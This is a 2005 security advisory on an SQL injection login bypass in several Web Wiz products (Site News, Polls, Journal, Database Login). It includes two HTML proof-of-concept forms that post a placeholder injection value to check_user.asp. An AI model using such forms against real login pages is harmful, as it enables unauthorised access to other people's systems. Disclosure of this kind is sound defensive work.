

Title           Web Wiz Multiple Products SQL Injection Vulnerability
Published       2005-12-30-12:00AM
Updated         2005-12-30-04:27PM
Class           Input Validation Error
CVE             CVE-MAP-NOMATCH
Remote          Yes
Local           No
Credit          Discovered by DevilBox of KAPDA.
Vulnerable      Web Wiz Site News Access 97 3.0 6
                Web Wiz Site News Access 2000 3.0 6
                Web Wiz Polls Access 97 3.0 6
                Web Wiz Polls Access 2000 3.0 6
                Web Wiz Journal Access 97 1.0
                Web Wiz Journal Access 2000 1.0
                Web Wiz Database Login Access 97 1.71
                Web Wiz Database Login Access 2000 1.71
Not Vulnerable
Code            An exploit is not required.

The following proof of concept example is available:
<html>
<h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://www.example.com/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

<html>
<h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://www.example.com/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

Copyright 2007, SecurityDot
Tue, 15 Dec 2009 22:58:11 +0000
